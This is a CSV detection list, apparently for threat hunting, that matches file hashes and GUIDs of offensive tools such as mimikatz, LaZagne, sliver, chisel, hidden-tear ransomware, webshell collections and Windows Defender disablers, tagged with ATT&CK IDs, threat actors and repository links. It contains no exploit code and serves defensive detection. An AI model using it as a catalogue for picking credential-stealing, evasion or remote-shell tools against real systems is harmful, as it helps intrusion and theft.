"*8dca31ac3cffeacb63b9f572bb9f4b53481e51d1d74269168834c395725f0b6e*",".{0,1000}8dca31ac3cffeacb63b9f572bb9f4b53481e51d1d74269168834c395725f0b6e.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","30853"
"*8dcbb18e02d5be2663448810946eae9f1618afebe35d779699afc9ece1bc1fcc*",".{0,1000}8dcbb18e02d5be2663448810946eae9f1618afebe35d779699afc9ece1bc1fcc.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30854"
"*8dd0633df72aacd10c634a263f6b1ade7195508e79993681e0800527ddfd86ef*",".{0,1000}8dd0633df72aacd10c634a263f6b1ade7195508e79993681e0800527ddfd86ef.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","#filehash","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","30856"
"*8dd9febd2c4e197aa92735534aa84b224afd75366b325430964d19bbdbe7a4a8*",".{0,1000}8dd9febd2c4e197aa92735534aa84b224afd75366b325430964d19bbdbe7a4a8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30857"
"*8ddfdad7d1865d85b87670ebf29a4fef1f3cc42cef56d1785c8ecc21cef6e55c*",".{0,1000}8ddfdad7d1865d85b87670ebf29a4fef1f3cc42cef56d1785c8ecc21cef6e55c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30861"
"*8DE42DA3-BE99-4E7E-A3D2-3F65E7C1ABCE*",".{0,1000}8DE42DA3\-BE99\-4E7E\-A3D2\-3F65E7C1ABCE.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","30862"
"*8de962c37d5fd876e8b402dd86e334a6ab66b6fa8242a2c8eeef4b6d1d0457ec*",".{0,1000}8de962c37d5fd876e8b402dd86e334a6ab66b6fa8242a2c8eeef4b6d1d0457ec.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","30863"
"*8dece0ec5b60725419e384b317c5be3c15d3cc12c1c7da28a53ec344118f9cd9*",".{0,1000}8dece0ec5b60725419e384b317c5be3c15d3cc12c1c7da28a53ec344118f9cd9.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","#filehash","N/A","10","1","30","7","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z","30864"
"*8DED0EC8-3611-4481-88FC-14B82531FD2B*",".{0,1000}8DED0EC8\-3611\-4481\-88FC\-14B82531FD2B.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","30865"
"*8deed22ba3df2bf2f097be4cc94d9a17651599ccdfead82fccb85fa87c7c69e4*",".{0,1000}8deed22ba3df2bf2f097be4cc94d9a17651599ccdfead82fccb85fa87c7c69e4.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30866"
"*8df104dd0a3a4290bbc33eb8a98a771a8f391120f3014ccb9f2cf496561cccd4*",".{0,1000}8df104dd0a3a4290bbc33eb8a98a771a8f391120f3014ccb9f2cf496561cccd4.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","30867"
"*8e029c31e7cbb4c481a10a27514bbaf746323fc251c002d132eaf374aae26206*",".{0,1000}8e029c31e7cbb4c481a10a27514bbaf746323fc251c002d132eaf374aae26206.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","30868"
"*8e068fd6cafac177fcf10e61a2672c0e572180bc20270e47e55525ad027d729d*",".{0,1000}8e068fd6cafac177fcf10e61a2672c0e572180bc20270e47e55525ad027d729d.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","30870"
"*8e0a61ae75c32370711ca475269fb91dfeb09534a1da08a4f3f1e71c13c1eaa9*",".{0,1000}8e0a61ae75c32370711ca475269fb91dfeb09534a1da08a4f3f1e71c13c1eaa9.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","30871"
"*8e0accdd48e1d04e3693326de2750b1e68f75fde6e012dc195cb876088704bdb*",".{0,1000}8e0accdd48e1d04e3693326de2750b1e68f75fde6e012dc195cb876088704bdb.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","30872"
"*8e1166362185fa69479caf4b8b153f06799c7143f6b726f9dc5250835f979d62*",".{0,1000}8e1166362185fa69479caf4b8b153f06799c7143f6b726f9dc5250835f979d62.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30874"
"*8e122c687fec626c06bd82a2141ea1c49b262ed8e6d93b95583dbe46811b1629*",".{0,1000}8e122c687fec626c06bd82a2141ea1c49b262ed8e6d93b95583dbe46811b1629.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","#filehash","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","30876"
"*8e1f17fdae5b13fde1ce339439aad3684a758bee89941f69e00d010a6e1bdfbc*",".{0,1000}8e1f17fdae5b13fde1ce339439aad3684a758bee89941f69e00d010a6e1bdfbc.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","30877"
"*8e222919847637b1a4c781f780722a7ab32a1e3d310b91496fec82fa38952409*",".{0,1000}8e222919847637b1a4c781f780722a7ab32a1e3d310b91496fec82fa38952409.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30878"
"*8e22b594e3d101bd26176cf972074d24f850b0f786fdb7254e452183671f03d3*",".{0,1000}8e22b594e3d101bd26176cf972074d24f850b0f786fdb7254e452183671f03d3.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30879"
"*8e25d415c6b4cf0960429c6c9e1ab7720d4dcd637ee15e0e13bcc82d7d7b203b*",".{0,1000}8e25d415c6b4cf0960429c6c9e1ab7720d4dcd637ee15e0e13bcc82d7d7b203b.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","30882"
"*8e2f8144fae305ecff5759bb38e384682642e766dfe85179555d7b621d92b836*",".{0,1000}8e2f8144fae305ecff5759bb38e384682642e766dfe85179555d7b621d92b836.{0,1000}","offensive_tool_keyword","DirtyCLR","An App Domain Manager Injection DLL PoC","T1055.001 - T1546.016 - T1055.013","TA0005 - TA0004","N/A","Black Basta","Privilege Escalation","https://github.com/ipSlav/DirtyCLR","1","0","#filehash","N/A","7","2","170","19","2023-12-14T21:22:12Z","2023-12-11T11:29:36Z","30884"
"*8e348a738400c38f4fe75a08f7b63e290f4b06204552190f910d39e24e61c89a*",".{0,1000}8e348a738400c38f4fe75a08f7b63e290f4b06204552190f910d39e24e61c89a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30890"
"*8e3d537a09b98a466d58a71a21a3a9719bde8ced6344a2a0b7ef96fd6a9a06e1*",".{0,1000}8e3d537a09b98a466d58a71a21a3a9719bde8ced6344a2a0b7ef96fd6a9a06e1.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30892"
"*8e412bd460d0481671cf9dfe4ef2d5521f3a658e8c3ef1deefa7c445629ee667*",".{0,1000}8e412bd460d0481671cf9dfe4ef2d5521f3a658e8c3ef1deefa7c445629ee667.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","30893"
"*8e456a357b00fa82bc589a1a13f4dac4ace146083709d6e53106f86095df0f8d*",".{0,1000}8e456a357b00fa82bc589a1a13f4dac4ace146083709d6e53106f86095df0f8d.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","30895"
"*8e4732c33f20cfcb9d2b22ef388c1a22bbf1de084474de1cd1b88d3da275a938*",".{0,1000}8e4732c33f20cfcb9d2b22ef388c1a22bbf1de084474de1cd1b88d3da275a938.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30897"
"*8e4b218bdbd8e098fff749fe5e5bbf00275d21f398b34216a573224e192094b8*",".{0,1000}8e4b218bdbd8e098fff749fe5e5bbf00275d21f398b34216a573224e192094b8.{0,1000}","offensive_tool_keyword","OperaPassView","OperaPassView is a small password recovery tool that decrypts the content of the Opera Web browser password file (wand.dat) and displays the list of all Web site passwords stored in this file","T1003 - T1555 - T1145","TA0006 - TA0009","N/A","BlackSuit - Royal - GoGoogle - XDSpy","Credential Access","https://www.nirsoft.net/utils/opera_password_recovery.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","30899"
"*8e4d5ff7eded1548f94e999720dc39564c2137a9d6a9439e085fb96591244417*",".{0,1000}8e4d5ff7eded1548f94e999720dc39564c2137a9d6a9439e085fb96591244417.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","30900"
"*8e56993ac94d62cedebac2d57693f96fe51b40b8b5ca8e9b6cf3e5845f6e9342*",".{0,1000}8e56993ac94d62cedebac2d57693f96fe51b40b8b5ca8e9b6cf3e5845f6e9342.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30903"
"*8e57e88d9d21a9c125430aae2741afd816b870257d522637972de23efd922909*",".{0,1000}8e57e88d9d21a9c125430aae2741afd816b870257d522637972de23efd922909.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","30904"
"*8e657b59afa655e83a1794700bd13929e3fa6ebe84b415df51a6088e27aee2a5*",".{0,1000}8e657b59afa655e83a1794700bd13929e3fa6ebe84b415df51a6088e27aee2a5.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","30908"
"*8e66227e48270913e40edcabdaa2d20332572f8ca6d066737e4ae3984d66b591*",".{0,1000}8e66227e48270913e40edcabdaa2d20332572f8ca6d066737e4ae3984d66b591.{0,1000}","offensive_tool_keyword","UnstoppableService","a Windows service in C# that is self installing as a single executable and sets proper attributes to prevent an administrator from stopping or pausing the service through the Windows Service Control Manager interface","T1543.003 - T1564.001 - T1490","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/malcomvetter/UnstoppableService","1","0","#filehash","N/A","5","1","66","15","2019-01-19T22:38:18Z","2018-08-07T22:11:22Z","30909"
"*8e6eda0e8e14ac796434d506f11f68e1c25b44758c4a1eecc0b48a53c39cb7be*",".{0,1000}8e6eda0e8e14ac796434d506f11f68e1c25b44758c4a1eecc0b48a53c39cb7be.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30910"
"*8e71740b1b1dd564dc2c05bb1e355baef9d0ab9bb14fafd91df60ba0998af866*",".{0,1000}8e71740b1b1dd564dc2c05bb1e355baef9d0ab9bb14fafd91df60ba0998af866.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","30911"
"*8e78f65f698f4adaa1ee3e14a5327a7ca7372140f82240d8cc40e753a172a9db*",".{0,1000}8e78f65f698f4adaa1ee3e14a5327a7ca7372140f82240d8cc40e753a172a9db.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30912"
"*8e7eaf585d3bc9f87159ff49850b074c42a7b192ce6540b06ed04ded87ba0d92*",".{0,1000}8e7eaf585d3bc9f87159ff49850b074c42a7b192ce6540b06ed04ded87ba0d92.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30914"
"*8e8053c4ec1c1bebf984ba0e868361a87e5240993a6feec5ba3626a11f23cb87*",".{0,1000}8e8053c4ec1c1bebf984ba0e868361a87e5240993a6feec5ba3626a11f23cb87.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#filehash","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","30915"
"*8e81fd470bb1b6091600ba95f951405e35c9ee980ef34dbe6525a5aa0a672448*",".{0,1000}8e81fd470bb1b6091600ba95f951405e35c9ee980ef34dbe6525a5aa0a672448.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","30916"
"*8e8f868c283b165b0ccf0da8c85458d10d785bc872007be2ee33cb756a741ceb*",".{0,1000}8e8f868c283b165b0ccf0da8c85458d10d785bc872007be2ee33cb756a741ceb.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#filehash","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","30918"
"*8e8fd5568a528f3b1148ba91ab2478082281896f72913d3a126ca66aa674d1da*",".{0,1000}8e8fd5568a528f3b1148ba91ab2478082281896f72913d3a126ca66aa674d1da.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30919"
"*8e92ea80b86a38b2f0de7052da3a75175710f613dfb1195721a6c1b3eb53f8cc*",".{0,1000}8e92ea80b86a38b2f0de7052da3a75175710f613dfb1195721a6c1b3eb53f8cc.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30920"
"*8e954ebb0db4a599f3257b78ab4aec73f4e31e49fdf1e8da9b6705ce7cf84858*",".{0,1000}8e954ebb0db4a599f3257b78ab4aec73f4e31e49fdf1e8da9b6705ce7cf84858.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","30921"
"*8e9a84da243905685ca77b6ef71841e610b88b7963d4de59f6dcbdd1621ecacd*",".{0,1000}8e9a84da243905685ca77b6ef71841e610b88b7963d4de59f6dcbdd1621ecacd.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","30922"
"*8e9a84da243905685ca77b6ef71841e610b88b7963d4de59f6dcbdd1621ecacd*",".{0,1000}8e9a84da243905685ca77b6ef71841e610b88b7963d4de59f6dcbdd1621ecacd.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","30923"
"*8eac62cb8511aa57cad56fa5b9a7205844ab2b46707e313bf754b520dec23a36*",".{0,1000}8eac62cb8511aa57cad56fa5b9a7205844ab2b46707e313bf754b520dec23a36.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30924"
